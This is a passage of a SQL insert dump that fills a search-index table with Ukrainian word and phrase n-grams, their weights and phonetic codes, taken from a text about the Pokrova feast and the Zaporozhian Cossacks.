а',0,1,1.3,'п000',1,'*'),(1603722,'покрови а її','покрови а її',0,1,1.4,'п000',1,'*'),(1603723,'покрови божої','покрови божої',0,1,1.4333,'п000',1,'*'),(1603724,'покрови божої матері','покрови божої матері',0,1,1.6667,'п000',1,'*'),(1603725,'покрови було','покрови було',0,1,1.4,'п000',1,'*'),(1603726,'покрови було в','покрови було в',0,1,1.4667,'п000',1,'*'),(1603727,'покрови пресвятої','покрови пресвятої',0,1,1.5667,'п000',1,'*'),(1603728,'покрови пресвятої богородиці','покрови пресвятої богородиці',0,1,1.9333,'п000',1,'*'),(1603729,'покрови пресвятої владичиці','покрови пресвятої владичиці',0,1,1.9,'п000',1,'*'),(1603730,'покрови символ','покрови символ',0,1,1.4667,'п000',1,'*'),(1603731,'покрови символ невпинного','покрови символ невпинного',0,1,1.8333,'п000',1,'*'),(1603732,'покровом','покровом',0,0,0.5333,'п000',1,'*'),(1603733,'покровом богородиці','покровом богородиці',0,1,1.6333,'п000',1,'*'),(1603734,'покровом богородиці у','покровом богородиці у',0,1,1.7,'п000',1,'*'),(1603735,'покровською','покровською',0,0,0.7333,'п000',1,'*'),(1603736,'покровською з\'явився','покровською з',0,1,1.6667,'п000',1,'*'),(1603737,'покровською з\'явився навіть','покровською з навіть',0,1,1.9,'п000',1,'*'),(1603738,'покрову вони','покрову вони',0,1,1.4,'п000',1,'*'),(1603739,'покрову вони вирушали','покрову вони вирушали',0,1,1.7,'п000',1,'*'),(1603740,'покрову до','покрову до',0,1,1.3333,'п000',1,'*'),(1603741,'покрову до обіду','покрову до обіду',0,1,1.5333,'п000',1,'*'),(1603742,'покрову молилися','покрову молилися',0,1,1.5333,'п000',1,'*'),(1603743,'покрову молилися за','покрову молилися за',0,1,1.6333,'п000',1,'*'),(1603744,'покрову українські','покрову українські',0,1,1.6,'п000',1,'*'),(1603745,'покрову українські козаки','покрову українські козаки',0,1,1.8333,'п000',1,'*'),(1603746,'потім','потім',0,0,0.3333,'п000',2,'*'),(1603747,'потім божа','потім божа',0,1,1.3333,'п000',1,'*'),(1603748,'потім божа матір','потім божа матір',0,1,1.5333,'п000',1,'*'),(1603749,'походах','походах',0,0,0.4667,'п000',1,'*'),(1603750,'походах захищаючи','походах захищаючи',0,1,1.5667,'п000',1,'*'),(1603751,'походах захищаючи рідну','походах захищаючи рідну',0,1,1.7667,'п000',1,'*'),(1603752,'походи','походи',0,0,0.4,'п000',1,'*'),(1603753,'походи перед','походи перед',0,1,1.4,'п000',1,'*'),(1603754,'походи перед кожним','походи перед кожним',0,1,1.6333,'п000',1,'*'),(1603755,'походом','походом',0,0,0.4667,'п000',1,'*'),(1603756,'походом навколішки','походом навколішки',0,1,1.6,'п000',1,'*'),(1603757,'походом навколішки ставали','походом навколішки ставали',0,1,1.8667,'п000',1,'*'),(1603758,'походу','походу',0,0,0.4,'п000',1,'*'),(1603759,'походу незалежно','походу незалежно',0,1,1.5333,'п000',1,'*'),(1603760,'походу незалежно від','походу незалежно від',0,1,1.6667,'п000',1,'*'),(1603761,'пресвята','пресвята',0,0,0.5333,'п000',1,'*'),(1603762,'пресвята владичиця','пресвята владичиця',0,1,1.6,'п000',1,'*'),(1603763,'пресвята владичиця сяяла','пресвята владичиця сяяла',0,1,1.8,'п000',1,'*'),(1603764,'пресвята діва','пресвята діва',0,1,1.4333,'п000',1,'*'),(1603765,'пресвята діва марія','пресвята діва марія',0,1,1.6333,'п000',1,'*'),(1603766,'пресвятої богородиці 14','пресвятої богородиці 14',0,1,1.7667,'п000',1,'*'),(1603767,'пресвятої богородиці «під','пресвятої богородиці «під',0,1,1.8333,'п000',1,'*'),(1603768,'пресвятої богородиці покрова','пресвятої богородиці покрова',0,1,1.9333,'п000',1,'*'),(1603769,'пресвятої владичиці','пресвятої владичиці',0,1,1.6333,'п000',1,'*'),(1603770,'пресвятої владичиці нашої','пресвятої владичиці нашої',0,1,1.8333,'п000',1,'*'),(1603771,'пресвятої діви','пресвятої діви',0,1,1.4667,'п000',1,'*'),(1603772,'пресвятої діви знак','пресвятої діви знак',0,1,1.6333,'п000',1,'*'),(1603773,'прибігаємо».','прибігаємо».',0,0,0.8,'п000',1,'*'),(1603774,'прибігаємо». після','прибігаємо». після',0,1,1.6,'п000',1,'*'),(1603775,'прибігаємо». після завершення','прибігаємо». після завершення',0,1,1.9667,'п000',1,'*'),(1603776,'призначали','призначали',0,0,0.6667,'п000',1,'*'),(1603777,'призначали весілля','призначали весілля',0,1,1.6,'п000',1,'*'),(1603778,'призначали весілля нерідко','призначали весілля нерідко',0,1,1.8667,'п000',1,'*'),(1603779,'приснодіви','приснодіви',0,0,0.6667,'п000',1,'*'),(1603780,'приснодіви марії','приснодіви марії',0,1,1.5333,'п000',1,'*'),(1603781,'причинами','причинами',0,0,0.6,'п000',1,'*'),(1603782,'причинами залишалися','причинами залишалися',0,1,1.6667,'п000',1,'*'),(1603783,'причинами залишалися у','причинами залишалися у',0,1,1.7333,'п000',1,'*'),(1603784,'про те','про те',0,1,1.2,'п000',1,'*'),(1603785,'про те як','про те як',0,1,1.3,'п000',1,'*'),(1603786,'промені','промені',0,0,0.4667,'п000',1,'*'),(1603787,'промені сонячні».','промені сонячні».',0,1,1.5667,'п000',1,'*'),(1603788,'промені сонячні». цей','промені сонячні». цей',0,1,1.7,'п000',1,'*'),(1603789,'пропозиції','пропозиції',0,0,0.6667,'п000',2,'*'),(1603790,'пропозиції цим','пропозиції цим',0,1,1.4667,'п000',1,'*'),(1603791,'пропозиції цим самим','пропозиції цим самим',0,1,1.6667,'п000',1,'*'),(1603792,'прохання','прохання',0,0,0.5333,'п000',1,'*'),(1603793,'прохання козаків','прохання козаків',0,1,1.5333,'п000',1,'*'),(1603794,'прохання козаків новообранийкошовий','прохання козаків новообранийкошовий',0,1,2,'п000',1,'*'),(1603795,'прощалися','прощалися',0,0,0.6,'п000',1,'*'),(1603796,'прощалися з','прощалися з',0,1,1.3667,'п000',1,'*'),(1603797,'прощалися з осінню','прощалися з осінню',0,1,1.6,'п000',1,'*'),(1603798,'рід','рід',0,0,0.2,'р000',1,'*'),(1603799,'рід людський','рід людський',0,1,1.4,'р000',1,'*'),(1603800,'рід людський воно','рід людський воно',0,1,1.5667,'р000',1,'*'),(1603801,'рідних','рідних',0,0,0.4,'р000',1,'*'),(1603802,'рідних місць','рідних місць',0,1,1.4,'р000',1,'*'),(1603803,'рідних місць за','рідних місць за',0,1,1.5,'р000',1,'*'),(1603804,'рідну','рідну',0,0,0.3333,'р000',1,'*'),(1603805,'рідну землю','рідну землю',0,1,1.3667,'р000',1,'*'),(1603806,'рідну землю обирали','рідну землю обирали',0,1,1.6333,'р000',1,'*'),(1603807,'різними','різними',0,0,0.4667,'р000',1,'*'),(1603808,'різними причинами','різними причинами',0,1,1.5667,'р000',1,'*'),(1603809,'різними причинами залишалися','різними причинами залишалися',0,1,1.9333,'р000',1,'*'),(1603810,'раді','раді',0,0,0.2667,'р000',2,'*'),(1603811,'раді січовики','раді січовики',0,1,1.4333,'р000',1,'*'),(1603812,'раді січовики щороку','раді січовики щороку',0,1,1.6667,'р000',1,'*'),(1603813,'розпростертим','розпростертим',0,0,0.8667,'р000',1,'*'),(1603814,'розпростертим покровом','розпростертим покровом',0,1,1.7333,'р000',1,'*'),(1603815,'розпростертим покровом богородиці','розпростертим покровом богородиці',0,1,2,'р000',1,'*'),(1603816,'році','році',0,0,0.2667,'р000',3,'*'),(1603817,'році богородиця','році богородиця',0,1,1.5,'р000',1,'*'),(1603818,'році богородиця осяяна','році богородиця осяяна',0,1,1.7333,'р000',1,'*'),(1603819,'році козаки','році козаки',0,1,1.3667,'р000',1,'*'),(1603820,'році козаки що','році козаки що',0,1,1.4667,'р000',1,'*'),(1603821,'руках','руках',0,0,0.3333,'р000',1,'*'),(1603822,'руках її','руках її',0,1,1.2667,'р000',1,'*'),(1603823,'руках її блищав','руках її блищав',0,1,1.5,'р000',1,'*'),(1603824,'січі','січі',0,0,0.2667,'с000',1,'*'),(1603825,'січі залишалася','січі залишалася',0,1,1.5,'с000',1,'*'),(1603826,'січі залишалася тільки','січі залишалася тільки',0,1,1.7333,'с000',1,'*'),(1603827,'січі у','січі у',0,1,1.2,'с000',1,'*'),(1603828,'січі у 1775','січі у 1775',0,1,1.3667,'с000',1,'*'),(1603829,'січова','січова',0,0,0.4,'с000',1,'*'),(1603830,'січова церква','січова церква',0,1,1.4333,'с000',1,'*'),(1603831,'січова церква завжди','січова церква завжди',0,1,1.6667,'с000',1,'*'),(1603832,'січовиків','січовиків',0,0,0.6,'с000',1,'*'),(1603833,'січовиків які','січовиків які',0,1,1.4333,'с000',1,'*'),(1603834,'січовиків які нічого','січовиків які нічого',0,1,1.6667,'с000',1,'*'),(1603835,'січовики','січовики',0,0,0.5333,'с000',1,'*'),(1603836,'січовики щороку','січовики щороку',0,1,1.5,'с000',1,'*'),(1603837,'січовики щороку обирали','січовики щороку обирали',0,1,1.7667,'с000',1,'*'),(1603838,'саме','саме',0,0,0.2667,'с000',5,'*'),(1603839,'саме на','саме на',0,1,1.2333,'с000',3,'*'),(1603840,'саме на покрову','саме на покрову',0,1,1.5,'с000',1,'*'),(1603841,'саме на свято','саме на свято',0,1,1.4333,'с000',1,'*'),(1603842,'самим','самим',0,0,0.3333,'с000',2,'*'),(1603843,'самим підкреслюючи','самим підкреслюючи',0,1,1.6,'с000',1,'*'),(1603844,'самим підкреслюючи що','самим підкреслюючи що',0,1,1.7,'с000',1,'*'),(1603845,'світлом','світлом',0,0,0.4667,'с000',1,'*'),(1603846,'світлом й','світлом й',0,1,1.3,'с000',1,'*'),(1603847,'світлом й оточена','світлом й оточена',0,1,1.5667,'с000',1,'*'),(1603848,'своєю','своєю',0,0,0.3333,'с000',1,'*'),(1603849,'своєю заступницею','своєю заступницею',0,1,1.5667,'с000',1,'*'),(1603850,'своєю заступницею тому','своєю заступницею тому',0,1,1.7333,'с000',1,'*'),(1603851,'своїм','своїм',0,0,0.3333,'с000',2,'*'),(1603852,'своїм омофором','своїм омофором',0,1,1.4667,'с000',1,'*'),(1603853,'своїм омофором грецький','своїм омофором грецький',0,1,1.7667,'с000',1,'*'),(1603854,'своїм побратимам','своїм побратимам',0,1,1.5333,'с000',1,'*'),(1603855,'своїм побратимам за','своїм побратимам за',0,1,1.6333,'с000',1,'*'),(1603856,'своїх','своїх',0,0,0.3333,'с000',1,'*'),(1603857,'своїх куренях','своїх куренях',0,1,1.4333,'с000',1,'*'),(1603858,'своїх куренях а','своїх куренях а',0,1,1.5,'с000',1,'*'),(1603859,'своїх хуторах','своїх хуторах',0,1,1.4333,'с000',1,'*'),(1603860,'своїх хуторах та','своїх хуторах та',0,1,1.5333,'с000',1,'*'),(1603861,'свою','свою',0,0,0.2667,'с000',2,'*'),(1603862,'свою опіку','свою опіку',0,1,1.3333,'с000',1,'*'),(1603863,'свою опіку покрила','свою опіку покрила',0,1,1.6,'с000',1,'*'),(1603864,'свят','свят',0,0,0.2667,'с000',2,'*'),(1603865,'свят тому','свят тому',0,1,1.3,'с000',1,'*'),(1603866,'свят тому на','свят тому на',0,1,1.4,'с000',1,'*'),(1603867,'свята то','свята то',0,1,1.2667,'с000',1,'*'),(1603868,'свята то і','свята то і',0,1,1.3333,'с000',1,'*'),(1603869,'святими','святими',0,0,0.4667,'с000',1,'*'),(1603870,'святими з\'явилася','святими з',0,1,1.5667,'с000',1,'*'),(1603871,'святими з\'явилася людям','святими з людям',0,1,1.7667,'с000',1,'*'),(1603872,'свято на','свято на',0,1,1.2667,'с000',1,'*'),(1603873,'свято на покрову','свято на покрову',0,1,1.5333,'с000',1,'*'),(1603874,'свято покрови','свято покрови',0,1,1.4333,'с000',1,'*'),(1603875,'свято покрови божої','свято покрови божої',0,1,1.6333,'с000',1,'*'),(1603876,'свято покрови пресвятої','свято покрови пресвятої',0,1,1.7667,'с000',1,'*'),(1603877,'священники','священники',0,0,0.6667,'с000',1,'*'),(1603878,'священники на','священники на',0,1,1.4333,'с000',1,'*'),(1603879,'священники на богослужіннях','священники на богослужіннях',0,1,1.9,'с000',1,'*'),(1603880,'символ','символ',0,0,0.4,'с000',2,'*'),(1603881,'символ невпинного','символ невпинного',0,1,1.5667,'с000',1,'*'),(1603882,'символ невпинного заступництва','символ невпинного заступництва',0,1,2,'с000',1,'*'),(1603883,'славою','славою',0,0,0.4,'с000',1,'*'),(1603884,'славою а','славою а',0,1,1.2667,'с000',1,'*'),(1603885,'славою а покрив','славою а покрив',0,1,1.5,'с000',1,'*'),(1603886,'сльозами','сльозами',0,0,0.5333,'с000',1,'*'),(1603887,'сльозами стала','сльозами стала',0,1,1.4667,'с000',1,'*'),(1603888,'сльозами стала молити','сльозами стала молити',0,1,1.7,'с000',1,'*'),(1603889,'сніг','сніг',0,0,0.2667,'с000',1,'*'),(1603890,'сніг який','сніг який',0,1,1.3,'с000',1,'*'),(1603891,'сніг який асоціюється','сніг який асоціюється',0,1,1.7,'с000',1,'*'),(1603892,'собі','собі',0,0,0.2667,'с000',1,'*'),(1603893,'собі кошового','собі кошового',0,1,1.4333,'с000',1,'*'),(1603894,'собі кошового отамана','собі кошового отамана',0,1,1.7,'с000',1,'*'),(1603895,'собою','собою',0,0,0.3333,'с000',1,'*'),(1603896,'собою як','собою як',0,1,1.2667,'с000',1,'*'),(1603897,'собою як найбільшу','собою як найбільшу',0,1,1.6,'с000',1,'*'),(1603898,'сонячні».','сонячні».',0,0,0.6,'с000',1,'*'),(1603899,'сонячні». цей','сонячні». цей',0,1,1.4333,'с000',1,'*'),(1603900,'сонячні». цей дивовижний','сонячні». цей дивовижний',0,1,1.8,'с000',1,'*'),(1603901,'ставали','ставали',0,0,0.4667,'с000',1,'*'),(1603902,'ставали на','ставали на',0,1,1.3333,'с000',1,'*'),(1603903,'ставали на молитву','ставали на молитву',0,1,1.6,'с000',1,'*'),(1603904,'ставлення','ставлення',0,0,0.6,'с000',1,'*'),(1603905,'ставлення до','ставлення до',0,1,1.4,'с000',1,'*'),(1603906,'ставлення до покрови','ставлення до покрови',0,1,1.6667,'с000',1,'*'),(1603907,'стала','стала',0,0,0.3333,'с000',1,'*'),(1603908,'стала залога','стала залога',0,1,1.4,'с000',1,'*'),(1603909,'стала залога із','стала залога із',0,1,1.5,'с000',1,'*'),(1603910,'стала молити','стала молити',0,1,1.4,'с000',1,'*'),(1603911,'стала молити бога','стала молити бога',0,1,1.5667,'с000',1,'*'),(1603912,'старшин','старшин',0,0,0.4667,'с000',1,'*'),(1603913,'старшин під','старшин під',0,1,1.3667,'с000',1,'*'),(1603914,'старшин під розпростертим','старшин під розпростертим',0,1,1.8333,'с000',1,'*'),(1603915,'створення','створення',0,0,0.6,'с000',2,'*'),(1603916,'створення української','створення української',0,1,1.7,'с000',1,'*'),(1603917,'створення української повстанської','створення української повстанської',0,1,2,'с000',1,'*'),(1603918,'сяяла','сяяла',0,0,0.3333,'с000',1,'*'),(1603919,'сяяла небесною','сяяла небесною',0,1,1.4667,'с000',1,'*'),(1603920,'сяяла небесною славою','сяяла небесною славою',0,1,1.7,'с000',1,'*'),(1603921,'ті','ті',0,0,0.1333,'т000',3,'*'),(1603922,'ті часи','ті часи',0,1,1.2333,'т000',1,'*'),(1603923,'ті часи основним','ті часи основним',0,1,1.5333,'т000',1,'*'),(1603924,'тільки','тільки',0,0,0.4,'т000',3,'*'),(1603925,'тільки стала','тільки стала',0,1,1.4,'т000',1,'*'),(1603926,'тільки стала залога','тільки стала залога',0,1,1.6333,'т000',1,'*'),(1603927,'та ікона','та ікона',0,1,1.2667,'т000',1,'*'),(1603928,'та ікона покрови','та ікона покрови',0,1,1.5333,'т000',1,'*'),(1603929,'та інших козаків','та інших козаків',0,1,1.5333,'т000',1,'*'),(1603930,'та їхніх','та їхніх',0,1,1.2667,'т000',1,'*'),(1603931,'та їхніх старшин','та їхніх старшин',0,1,1.5333,'т000',1,'*'),(1603932,'та захисниці','та захисниці',0,1,1.4,'т000',1,'*'),(1603933,'та захисниці від','та захисниці від',0,1,1.5333,'т000',1,'*'),(1603934,'та зимівниках','та зимівниках',0,1,1.4333,'т000',1,'*'),(1603935,'та зимівниках на','та зимівниках на',0,1,1.5333,'т000',1,'*'),(1603936,'та легендами','та легендами',0,1,1.4,'т000',1,'*'),(1603937,'та легендами саме','та легендами саме',0,1,1.5667,'т000',1,'*'),(1603938,'та приснодіви','та приснодіви',0,1,1.4333,'т000',1,'*'),(1603939,'та приснодіви марії','та приснодіви марії',0,1,1.6333,'т000',1,'*'),(1603940,'та святими','та святими',0,1,1.3333,'т000',1,'*'),(1603941,'та святими з\'явилася','та святими з',0,1,1.6667,'т000',1,'*'),(1603942,'та участі','та участі',0,1,1.3,'т000',1,'*'),(1603943,'та участі які','та участі які',0,1,1.4333,'т000',1,'*'),(1603944,'твою','твою',0,0,0.2667,'т000',1,'*'),(1603945,'твою милість','твою милість',0,1,1.4,'т000',1,'*'),(1603946,'твою милість прибігаємо».','твою милість прибігаємо».',0,1,1.8333,'т000',1,'*'),(1603947,'те','те',0,0,0.1333,'т000',1,'*'),(1603948,'те як','те як',0,1,1.1667,'т000',1,'*'),(1603949,'те як після','те як після',0,1,1.3667,'т000',1,'*'),(1603950,'тип','тип',0,0,0.2,'т000',1,'*'),(1603951,'тип ікони','тип ікони',0,1,1.3,'т000',1,'*'),(1603952,'тип ікони «козацька','тип ікони «козацька',0,1,1.6333,'т000',1,'*'),(1603953,'тканина','тканина',0,0,0.4667,'т000',1,'*'),(1603954,'тканина з','тканина з',0,1,1.3,'т000',1,'*'),(1603955,'тканина з хрестом','тканина з хрестом',0,1,1.5667,'т000',1,'*'),(1603956,'то','то',0,0,0.1333,'т000',2,'*'),(1603957,'то і','то і',0,1,1.1333,'т000',1,'*'),(1603958,'то і маємо','то і маємо',0,1,1.3333,'т000',1,'*'),(1603959,'тобто','тобто',0,0,0.3333,'т000',3,'*'),(1603960,'тобто довга','тобто довга',0,1,1.3667,'т000',1,'*'),(1603961,'тобто довга широка','тобто довга широка',0,1,1.6,'т000',1,'*'),(1603962,'товариство».','товариство».',0,0,0.8,'т000',1,'*'),(1603963,'товариство». погоджувався','товариство». погоджувався',0,1,1.8333,'т000',1,'*'),(1603964,'товариство». погоджувався після','товариство». погоджувався після',0,1,2,'т000',1,'*'),(1603965,'того','того',0,0,0.2667,'т000',2,'*'),(1603966,'того що','того що',0,1,1.2333,'т000',1,'*'),(1603967,'того що бере','того що бере',0,1,1.4,'т000',1,'*'),(1603968,'тому','тому',0,0,0.2667,'т000',4,'*'),(1603969,'тому ікона','тому ікона',0,1,1.3333,'т000',1,'*'),(1603970,'тому ікона марії','тому ікона марії',0,1,1.5333,'т000',1,'*'),(1603971,'тому на','тому на',0,1,1.2333,'т000',1,'*'),(1603972,'тому на честь','тому на честь',0,1,1.4333,'т000',1,'*'),(1603973,'третьої','третьої',0,0,0.4667,'т000',2,'*'),(1603974,'третьої пропозиції','третьої пропозиції',0,1,1.6,'т000',1,'*'),(1603975,'третьої пропозиції цим','третьої пропозиції цим',0,1,1.7333,'т000',1,'*'),(1603976,'у 1775','у 1775',0,1,1.2,'у000',1,'*'),(1603977,'у 1775 році','у 1775 році',0,1,1.3667,'у000',1,'*'),(1603978,'у 910','у 910',0,1,1.1667,'у000',1,'*'),(1603979,'у 910 році','у 910 році',0,1,1.3333,'у000',1,'*'),(1603980,'у влахернському','у влахернському',0,1,1.5,'у000',1,'*'),(1603981,'у влахернському храмі','у влахернському храмі',0,1,1.7,'у000',1,'*'),(1603982,'у запорозьких','у запорозьких',0,1,1.4333,'у000',1,'*'),(1603983,'у запорозьких козаків','у запорозьких козаків',0,1,1.7,'у000',1,'*'),(1603984,'у кожному','у кожному',0,1,1.3,'у000',1,'*'),(1603985,'у кожному козацькому','у кожному козацькому',0,1,1.6667,'у000',1,'*'),(1603986,'у константинополі','у константинополі',0,1,1.5667,'у000',1,'*'),(1603987,'у константинополі за','у константинополі за',0,1,1.6667,'у000',1,'*'),(1603988,'у нелегкий','у нелегкий',0,1,1.3333,'у000',1,'*'),(1603989,'у нелегкий час','у нелегкий час',0,1,1.4667,'у000',1,'*'),(1603990,'у походах','у походах',0,1,1.3,'у000',1,'*'),(1603991,'у походах захищаючи','у походах захищаючи',0,1,1.6333,'у000',1,'*'),(1603992,'у походи','у походи',0,1,1.2667,'у000',1,'*'),(1603993,'у походи перед','у походи перед',0,1,1.4667,'у000',1,'*'),(1603994,'у руках','у руках',0,1,1.2333,'у000',1,'*'),(1603995,'у руках її','у руках її',0,1,1.3333,'у000',1,'*'),(1603996,'у своїх','у своїх',0,1,1.2333,'у000',1,'*'),(1603997,'у своїх куренях','у своїх куренях',0,1,1.5,'у000',1,'*'),(1603998,'у ті','у ті',0,1,1.1333,'у000',1,'*'),(1603999,'у ті часи','у ті часи',0,1,1.3,'у000',1,'*'),(1604000,'у храмі','у храмі',0,1,1.2333,'у000',1,'*'),(1604001,'у храмі чесним','у храмі чесним',0,1,1.4667,'у000',1,'*'),(1604002,'українські козаки','українські козаки',0,1,1.5667,'у000',1,'*'),(1604003,'українські козаки вважалибогоматір','українські козаки вважалибогоматір',0,1,2,'у000',1,'*'),(1604004,'українських','українських',0,0,0.7333,'у000',1,'*'),(1604005,'українських козаків','українських козаків',0,1,1.6333,'у000',1,'*'),(1604006,'українських козаків згідно','українських козаків згідно',0,1,1.8667,'у000',1,'*'),(1604007,'упа','упа',0,0,0.2,'у000',1,'*'),(1604008,'успішності','успішності',0,0,0.6667,'у000',1,'*'),(1604009,'успішності козаки','успішності козаки',0,1,1.5667,'у000',1,'*'),(1604010,'успішності козаки відправляли','успішності козаки відправляли',0,1,1.9667,'у000',1,'*'),(1604011,'участі','участі',0,0,0.4,'у000',1,'*'),(1604012,'участі які','участі які',0,1,1.3333,'у000',1,'*'),(1604013,'участі які матір','участі які матір',0,1,1.5333,'у000',1,'*'),(1604014,'фатою','фатою',0,0,0.3333,'ф000',1,'*'),(1604015,'фатою а','фатою а',0,1,1.2333,'ф000',1,'*'),(1604016,'фатою а ще','фатою а ще',0,1,1.3333,'ф000',1,'*'),(1604017,'хоругвах','хоругвах',0,0,0.5333,'х000',1,'*'),(1604018,'хоругвах під','хоругвах під',0,1,1.4,'х000',1,'*'),(1604019,'хоругвах під якими','хоругвах під якими',0,1,1.6,'х000',1,'*'),(1604020,'храмі','храмі',0,0,0.3333,'х000',1,'*'),(1604021,'храмі у','храмі у',0,1,1.2333,'х000',1,'*'),(1604022,'храмі у константинополі','храмі у константинополі',0,1,1.7667,'х000',1,'*'),(1604023,'храмі чесним','храмі чесним',0,1,1.4,'х000',1,'*'),(1604024,'храмі чесним своїм','храмі чесним своїм',0,1,1.6,'х000',1,'*'),(1604025,'храми','храми',0,0,0.3333,'х000',1,'*'),(1604026,'храми покров','храми покров',0,1,1.4,'х000',1,'*'),(1604027,'храми покров пресвятої','храми покров пресвятої',0,1,1.7333,'х000',1,'*'),(1604028,'хрестом','хрестом',0,0,0.4667,'х000',1,'*'),(1604029,'хрестом яку','хрестом яку',0,1,1.3667,'х000',1,'*'),(1604030,'хрестом яку носять','хрестом яку носять',0,1,1.6,'х000',1,'*'),(1604031,'християн','християн',0,0,0.5333,'х000',2,'*'),(1604032,'християн потім','християн потім',0,1,1.4667,'х000',1,'*'),(1604033,'християн потім божа','християн потім божа',0,1,1.6333,'х000',1,'*'),(1604034,'хуторах','хуторах',0,0,0.4667,'х000',1,'*'),(1604035,'хуторах та','хуторах та',0,1,1.3333,'х000',1,'*'),(1604036,'хуторах та зимівниках','хуторах та зимівниках',0,1,1.7,'х000',1,'*'),(1604037,'цінність','цінність',0,0,0.5333,'ц000',1,'*'),(1604038,'цінність ікону','цінність ікону',0,1,1.4667,'ц000',1,'*'),(1604039,'цінність ікону покрови','цінність ікону покрови',0,1,1.7333,'ц000',1,'*'),(1604040,'це не','це не',0,1,1.1667,'ц000',2,'*'),(1604041,'це не з','це не з',0,1,1.2333,'ц000',1,'*'),(1604042,'цей дивовижний','цей дивовижний',0,1,1.4667,'ц000',1,'*'),(1604043,'цей дивовижний покрив','цей дивовижний покрив',0,1,1.7,'ц000',1,'*'),(1604044,'церква','церква',0,0,0.4,'ц000',1,'*'),(1604045,'церква завжди','церква завжди',0,1,1.4333,'ц000',1,'*'),(1604046,'церква завжди була','церква завжди була',0,1,1.6,'ц000',1,'*'),(1604047,'церква завжди називалась','церква завжди називалась',0,1,1.8,'ц000',1,'*'),(1604048,'церковні','церковні',0,0,0.5333,'ц000',1,'*'),(1604049,'церковні свята','церковні свята',0,1,1.4667,'ц000',1,'*'),(1604050,'церковні свята то','церковні свята то',0,1,1.5667,'ц000',1,'*'),(1604051,'цим','цим',0,0,0.2,'ц000',2,'*'),(1604052,'цим самим','цим самим',0,1,1.3,'ц000',1,'*'),(1604053,'цим самим підкреслюючи','цим самим підкреслюючи',0,1,1.7333,'ц000',1,'*'),(1604054,'цього дня','цього дня',0,1,1.3,'ц000',1,'*'),(1604055,'цього дня прощалися','цього дня прощалися',0,1,1.6333,'ц000',1,'*'),(1604056,'цього дня часто','цього дня часто',0,1,1.5,'ц000',1,'*'),(1604057,'час цього','час цього',0,1,1.3,'ч000',1,'*'),(1604058,'час цього дня','час цього дня',0,1,1.4333,'ч000',1,'*'),(1604059,'часи основним','часи основним',0,1,1.4333,'ч000',1,'*'),(1604060,'часи основним календарем','часи основним календарем',0,1,1.8,'ч000',1,'*'),(1604061,'часто','часто',0,0,0.3333,'ч000',2,'*'),(1604062,'часто освячують','часто освячують',0,1,1.5,'ч000',1,'*'),(1604063,'часто освячують новозбудовані','часто освячують новозбудовані',0,1,1.9667,'ч000',1,'*'),(1604064,'часто призначали','часто призначали',0,1,1.5333,'ч000',1,'*'),(1604065,'часто призначали весілля','часто призначали весілля',0,1,1.8,'ч000',1,'*'),(1604066,'чесним','чесним',0,0,0.4,'ч000',1,'*'),(1604067,'чесним своїм','чесним своїм',0,1,1.4,'ч000',1,'*'),(1604068,'чесним своїм омофором','чесним своїм омофором',0,1,1.7,'ч000',1,'*'),(1604069,'честі','честі',0,0,0.3333,'ч000',1,'*'),(1604070,'честі очолити','честі очолити',0,1,1.4333,'ч000',1,'*'),(1604071,'честі очолити «шановане','честі очолити «шановане',0,1,1.7667,'ч000',1,'*'),(1604072,'честь','честь',0,0,0.3333,'ч000',1,'*'),(1604073,'честь їх','честь їх',0,1,1.2667,'ч000',1,'*'),(1604074,'честь їх очолювати','честь їх очолювати',0,1,1.6,'ч000',1,'*'),(1604075,'честь божої','честь божої',0,1,1.3667,'ч000',1,'*'),(1604076,'честь божої матері','честь божої матері',0,1,1.6,'ч000',1,'*'),(1604077,'честь нього','честь нього',0,1,1.3667,'ч000',1,'*'),(1604078,'честь нього досить','честь нього досить',0,1,1.6,'ч000',1,'*'),(1604079,'честь покрови','честь покрови',0,1,1.4333,'ч000',1,'*'),(1604080,'честь покрови а','честь покрови а',0,1,1.5,'ч000',1,'*'),(1604081,'чотири','чотири',0,0,0.4,'ч000',2,'*'),(1604082,'чотири боки','чотири боки',0,1,1.3667,'ч000',1,'*'),(1604083,'чотири боки на','чотири боки на',0,1,1.4667,'ч000',1,'*'),(1604084,'широка','широка',0,0,0.4,'ш000',1,'*'),(1604085,'широка тканина','широка тканина',0,1,1.4667,'ш000',1,'*'),(1604086,'широка тканина з','широка тканина з',0,1,1.5333,'ш000',1,'*'),(1604087,'ще','ще',0,0,0.1333,'щ000',3,'*'),(1604088,'ще цього','ще цього',0,1,1.2667,'щ000',1,'*'),(1604089,'ще цього дня','ще цього дня',0,1,1.4,'щ000',1,'*'),(1604090,'що бере','що бере',0,1,1.2333,'щ000',1,'*'),(1604091,'що бере народ','що бере народ',0,1,1.4333,'щ000',1,'*'),(1604092,'що за','що за',0,1,1.1667,'щ000',1,'*'),(1604093,'що за різними','що за різними',0,1,1.4333,'щ000',1,'*'),(1604094,'що йде','що йде',0,1,1.2,'щ000',1,'*'),(1604095,'що йде на','що йде на',0,1,1.3,'щ000',1,'*'),(1604096,'що пішли','що пішли',0,1,1.2667,'щ000',1,'*'),(1604097,'що пішли з','що пішли з',0,1,1.3333,'щ000',1,'*'),(1604098,'щороку','щороку',0,0,0.4,'щ000',1,'*'),(1604099,'щороку обирали','щороку обирали',0,1,1.4667,'щ000',1,'*'),(1604100,'щороку обирали собі','щороку обирали собі',0,1,1.6333,'щ000',1,'*'),(1604101,'як заступниці','як заступниці',0,1,1.4333,'я000',1,'*'),(1604102,'як заступниці та','як заступниці та',0,1,1.5333,'я000',1,'*'),(1604103,'як найбільшу','як найбільшу',0,1,1.4,'я000',1,'*'),(1604104,'як найбільшу цінність','як найбільшу цінність',0,1,1.7,'я000',1,'*'),(1604105,'як після','як після',0,1,1.2667,'я000',1,'*'),(1604106,'як після зруйнування','як після зруйнування',0,1,1.6667,'я000',1,'*'),(1604107,'які матір','які матір',0,1,1.3,'я000',1,'*'),(1604108,'які матір божа','які матір божа',0,1,1.4667,'я000',1,'*'),(1604109,'які молилися','які молилися',0,1,1.4,'я000',1,'*'),(1604110,'які молилися у','які молилися у',0,1,1.4667,'я000',1,'*'),(1604111,'які нічого','які нічого',0,1,1.3333,'я000',1,'*'),(1604112,'які нічого крім','які нічого крім',0,1,1.5,'я000',1,'*'),(1604113,'які оточили','які оточили',0,1,1.3667,'я000',1,'*'),(1604114,'які оточили місто','які оточили місто',0,1,1.5667,'я000',1,'*'),(1604115,'які перебували','які перебували',0,1,1.4667,'я000',1,'*'),(1604116,'які перебували у','які перебували у',0,1,1.5333,'я000',1,'*'),(1604117,'якій','якій',0,0,0.2667,'я000',2,'*'),(1604118,'якій зображували','якій 